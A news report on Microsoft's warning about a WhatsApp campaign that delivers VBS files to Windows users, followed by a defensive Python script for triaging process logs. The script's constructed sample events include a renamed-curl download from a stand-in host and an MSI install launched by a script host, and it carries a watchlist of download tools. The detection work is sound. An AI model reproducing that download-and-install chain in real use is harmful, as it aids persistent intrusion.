WhatsApp malware targets Windows systems.
VBS files deliver multi-stage attacks.
User caution is critical for prevention.

Microsoft’s Defender Security Research team has issued a critical alert about a malware campaign aimed at WhatsApp users, saying the activity began on February 26. Officials said the operation relies on WhatsApp messages to deliver malicious Visual Basic Script (VBS) files that can trigger a multi-stage intrusion on Windows devices.
According to the security team, the attack chain starts when a user is persuaded to open a VBS file sent through a phishing attempt on WhatsApp. Once executed, the script initiates a sequence designed to compromise a Windows environment, using renamed Windows utilities as part of the process. The campaign then pulls additional components from cloud infrastructure that many users and organizations typically regard as reputable.
Microsoft said the attackers retrieve payloads from trusted cloud services including AWS, Tencent Cloud, and Backblaze B2. The company described this as a tactic that can complicate detection for traditional security controls, because the traffic and hosting locations may appear routine. The chain ultimately installs malicious Microsoft Installer packages, which Microsoft said are used to maintain persistent remote access.
Officials said the approach exploits user confidence in both messaging platforms and widely used cloud services. The result, Microsoft warned, can be ongoing access for threat actors, including persistent remote access to data on compromised Windows systems. The company also highlighted that the method can broaden an organization’s exposure, particularly where employees use personal messaging applications on work devices.
For individual users, Microsoft advised caution when handling links or files received through WhatsApp, emphasizing that attachments should only be opened when they come from known and trusted contacts. WhatsApp, the company noted, provides indicators that can help users assess risk, including whether a sender is not in a recipient’s contacts, the origin of the sender’s phone number, and whether there are mutual groups.
For enterprise environments, Microsoft said it recommends specific security measures to counter the VBS-based malware. While the company’s warning focused on this campaign’s delivery and execution chain, it also underscored an uncertainty for defenders: when attackers blend social engineering with legitimate-looking cloud hosting and familiar Windows components, it can be harder for standard detection methods to distinguish malicious activity from normal behavior.
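One way a defender might triage process-creation logs for the three stages described above: a script host running a VBS file, a renamed Windows utility, and an MSI install launched from a script host. This is an added example, not code from Microsoft or from the original article; the Sysmon-style field names, the utility watchlist and the sample events are assumptions constructed for illustration and are not indicators from the campaign.

```python
import ntpath

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# Assumed watchlist: built-in tools whose embedded PE name should match the file name.
WATCHED_UTILITIES = SCRIPT_HOSTS | {"curl.exe", "bitsadmin.exe", "certutil.exe", "msiexec.exe"}

def name(path):
    """Lower-cased file name of a Windows path."""
    return ntpath.basename(path).lower()

def findings(event):
    """Return the rule names matched by one process-creation event."""
    image = name(event.get("Image", ""))
    # OriginalFileName comes from the PE version resource and survives a rename on disk.
    tool = event.get("OriginalFileName", "").lower() or image
    parent = name(event.get("ParentImage", ""))
    cmdline = event.get("CommandLine", "").lower()
    hits = []
    if tool in WATCHED_UTILITIES and image != tool:
        hits.append("renamed_utility")          # known tool running under another name
    if tool in SCRIPT_HOSTS and ".vbs" in cmdline:
        hits.append("vbs_execution")            # script host asked to run a VBS file
    if tool == "msiexec.exe" and parent in SCRIPT_HOSTS:
        hits.append("msi_from_script_host")     # installer started by a script, not a user
    return hits

def triage(events):
    """Map event index -> matched rules, skipping events with no match."""
    return {i: h for i, e in enumerate(events) if (h := findings(e))}

# Constructed sample events (not taken from the campaign).
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\wscript.exe", "OriginalFileName": "wscript.exe",
     "CommandLine": r'wscript.exe "C:\Users\alice\Downloads\invoice.vbs"',
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"Image": r"C:\ProgramData\sample\updater.exe", "OriginalFileName": "curl.exe",
     "CommandLine": r"updater.exe -o C:\ProgramData\sample\a.bin https://storage.example/a.bin",
     "ParentImage": r"C:\Windows\System32\wscript.exe"},
    {"Image": r"C:\Windows\System32\msiexec.exe", "OriginalFileName": "msiexec.exe",
     "CommandLine": r"msiexec.exe /i C:\ProgramData\sample\setup.msi /qn",
     "ParentImage": r"C:\Windows\System32\wscript.exe"},
    {"Image": r"C:\Windows\System32\notepad.exe", "OriginalFileName": "NOTEPAD.EXE",
     "CommandLine": r"notepad.exe C:\Users\alice\notes.txt",
     "ParentImage": r"C:\Windows\explorer.exe"},
]

if __name__ == "__main__":
    for index, rules in triage(SAMPLE_EVENTS).items():
        print(index, rules)
```

Because the rename check compares the on-disk name with the name embedded in the binary, it does not depend on where the payload was hosted, which is the part of the chain the article says looks routine to traditional controls.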